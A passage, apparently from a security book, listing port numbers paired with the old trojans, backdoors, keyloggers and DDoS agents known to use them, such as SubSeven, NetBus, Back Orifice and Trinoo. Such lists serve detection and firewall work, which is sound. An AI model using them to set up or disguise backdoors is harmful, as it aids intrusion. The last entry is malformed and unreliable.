port 3791 Total Solar Eclypse port 3801 Total Solar Eclypse port 4000 SkyDance port 4092 WinCrash port 4242 Virtual Hacking Machine - VHM port 4321 BoBo port 4444 Prosiak, Swift Remote port 4567 File Nail port 4590 ICQ Trojan port 4950 ICQ Trogen (Lm) port 5000 Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie port 5001 Back Door Setup, Sockets des Troie port 5002 cd00r, Shaft port 5010 Solo port 5011 One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT, modified port 5025 WM Remote KeyLogger port 5031 Net Metropolitan port 5032 Net Metropolitan port 5321 Firehotcker port 5333 Backage, NetDemon port 5343 wCrat - WC Remote Administration Tool port 5400 Back Construction, Blade Runner port 5401 Back Construction, Blade Runner port 5402 Back Construction, Blade Runner port 5512 Illusion Mailer port 5534 The Flu port 5550 Xtcp port 5555 ServeMe port 5556 BO Facil port 5557 BO Facil port 5569 Robo-Hack port 5637 PC Crasher port 5638 PC Crasher port 5742 WinCrash port 5760 Portmap Remote Root Linux Exploit port 5880 Y3K RAT port 5882 Y3K RAT port 5882 (UDP) - Y3K RAT port 5888 Y3K RAT port 5888 (UDP) - Y3K RAT port 5889 Y3K RAT port 6000 The Thing port 6006 Bad Blood port 6272 Secret Service

158

port 6400 The Thing port 6661 TEMan, Weia-Meia port 6666 Dark Connection Inside, NetBus worm port 6667 Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan port 6669 Host Control, Vampire port 6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame port 6711 BackDoor-G, SubSeven, VP Killer port 6712 Funny trojan, SubSeven port 6713 SubSeven port 6723 Mstream port 6771 Deep Throat, Foreplay port 6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer port 6838 (UDP) - Mstream port 6883 Delta Source DarkStar (??) port 6912 Shit Heep port 6939 Indoctrination port 6969 GateCrasher, IRC 3, Net Controller, Priority port 6970 GateCrasher port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold port 7001 Freak88, Freak2k port 7215 SubSeven, SubSeven 2.1 Gold port 7300 NetMonitor port 7301 NetMonitor port 7306 NetMonitor port 7307 NetMonitor port 7308 NetMonitor port 7424 Host Control port 7424 (UDP) - Host Control port 7597 Qaz port 7626 Glacier port 7777 God Message, Tini port 7789 Back Door Setup, ICKiller port 7891 The ReVeNgEr port 7983 Mstream port 8080 Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero port 8787 Back Orifice 2000 port 8988 BacHack port 8989 Rcon, Recon, Xcon port 9000 Netministrator port 9325 (UDP) - Mstream port 9400 InCommand port 9872 Portal of Doom

159

port 9873 Portal of Doom port 9874 Portal of Doom port 9875 Portal of Doom port 9876 Cyber Attacker, Rux port 9878 TransScout port 9989 Ini-Killer port 9999 The Prayer port 10000 OpwinTRojan port 10005 OpwinTRojan port 10067 (UDP) - Portal of Doom port 10085 Syphillis port 10086 Syphillis port 10100 Control Total, Gift trojan port 10101 BrainSpy, Silencer port 10167 (UDP) - Portal of Doom port 10520 Acid Shivers port 10528 Host Control port 10607 Coma port 10666 (UDP) - Ambush port 11000 Senna Spy Trojan Generator port 11050 Host Control port 11051 Host Control port 11223 Progenic trojan, Secret Agent port 12076 Gjamer port 12223 Hack´99 KeyLogger port 12345 Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack Job, X-bill port 12346 Fat Bitch trojan, GabanBus, NetBus, X-bill port 12349 BioNet port 12361 Whack-a-mole port 12362 Whack-a-mole port 12363 Whack-a-mole port 12623 (UDP) - DUN Control port 12624 ButtMan port 12631 Whack Job port 12754 Mstream port 13000 Senna Spy Trojan Generator, Senna Spy Trojan Generator port 13010 Hacker Brasil - HBR port 13013 PsychWard port 13014 PsychWard port 13223 Hack´99 KeyLogger port 13473 Chupacabra port 14500 PC Invader

160

port 14501 PC Invader port 14502 PC Invader port 14503 PC Invader port 15000 NetDemon port 15092 Host Control port 15104 Mstream port 15382 SubZero port 15858 CDK port 16484 Mosucker port 16660 Stacheldraht port 16772 ICQ Revenge port 16959 SubSeven, Subseven 2.1.4 DefCon 8 port 16969 Priority port 17166 Mosaic port 17300 Kuang2 the virus port 17449 Kid Terror port 17499 CrazzyNet port 17500 CrazzyNet port 17569 Infector port 17593 Audiodoor port 17777 Nephron port 18753 (UDP) - Shaft port 19864 ICQ Revenge port 20000 Millenium port 20001 Millenium, Millenium (Lm) port 20002 AcidkoR port 20005 Mosucker port 20023 VP Killer port 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job port 20203 Chupacabra port 20331 BLA trojan port 20432 Shaft port 20433 (UDP) - Shaft port 21544 GirlFriend, Kid Terror port 21554 Exploiter, Kid Terror, Schwindler, Winsp00fer port 22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K port 23005 NetTrash port 23006 NetTrash port 23023 Logged port 23032 Amanda port 23432 Asylum port 23456 Evil FTP, Ugly FTP, Whack Job port 23476 Donald Dick port 23476 (UDP) - Donald Dick port 23477 Donald Dick

161

port 23777 InetSpy port 24000 Infector port 25685 Moonpie port 25686 Moonpie port 25982 Moonpie port 26274 (UDP) - Delta Source port 26681 Voice Spy port 27374 Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader port 27444 (UDP) - Trinoo port 27573 SubSeven port 27665 Trinoo port 28678 Exploiter port 29104 NetTrojan port 29369 ovasOn port 29891 The Unexplained port 30000 Infector port 30001 ErrOr32 port 30003 Lamers Death port 30029 AOL trojan port 30100 NetSphere port 30101 NetSphere port 30102 NetSphere port 30103 NetSphere port 30103 (UDP) - NetSphere port 30133 NetSphere port 30303 Sockets des Troie port 30947 Intruse port 30999 Kuang2 port 31335 Trinoo port 31336 Bo Whack, Butt Funnel port 31337 Back Fire, BackOrifice 1.20 patches, BackOrifice (Lm), BackOrifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp_pipe.c, Sockdmini port 31337 (UDP) - BackOrifice, Deep BO port 31338 Back Orifice, Butt Funnel, NetSpy (DK) port 31338 (UDP) - Deep BO port 31339 NetSpy (DK) port 31666 BOWhack port 31785 Hack´a´Tack port 31787 Hack´a´Tack port 31788 Hack´a´Tack port 31789 (UDP) - Hack´a´Tack port 31790 Hack´a´Tack

162

port 31791 (UDP) - Hack´a´Tack port 31792 Hack´a´Tack port 32001 Donald Dick port 32100 Peanut Brittle, Project nEXT port 32418 Acid Battery port 33270 Trinity port 33333 Blakharaz, Prosiak port 33577 Son of PsychWard port 33777 Son of PsychWard port 33911 Spirit 2000, Spirit 2001 port 34324 Big Gluck, TN port 34444 Donald Dick port 34555 (UDP) - Trinoo (for Windows) port 35555 (UDP) - Trinoo (for Windows) port 37237 Mantis port 37651 Yet Another Trojan - YAT port 40412 The Spy port 40421 Agent 40421, Masters Paradise port 40422 Masters Paradise port 40423 Masters Paradise port 40425 Masters Paradise port 40426 Masters Paradise port 41337 Storm port 41666 Remote Boot Tool - RBT, Remote Boot Tool - RBT port 44444 Prosiak port 44575 Exploiter port 47262 (UDP) - Delta Source port 49301 OnLine KeyLogger port 50130 Enterprise port 50505 Sockets des Troie port 50766 Fore, Schwindler port 51966 Cafeini port 52317 Acid Battery 2000 port 53001 Remote Windows Shutdown - RWS port 54283 SubSeven, SubSeven 2.1 Gold port 54320 Back Orifice 2000 port 54321 BackOrifice 2000, School Bus port 55165 File Manager trojan, File Manager trojan, WM Trojan Generator port 55166 WM Trojan Generator port 57341 NetRaider port 58339 Butt Funnel port 60000 DeepThroat, Foreplay, Sockets des Troie port 60001 Trinity port 60068 Xzip 6000068 (El Hacker, 2005)21.

163

Sign up to vote on this title
UsefulNot useful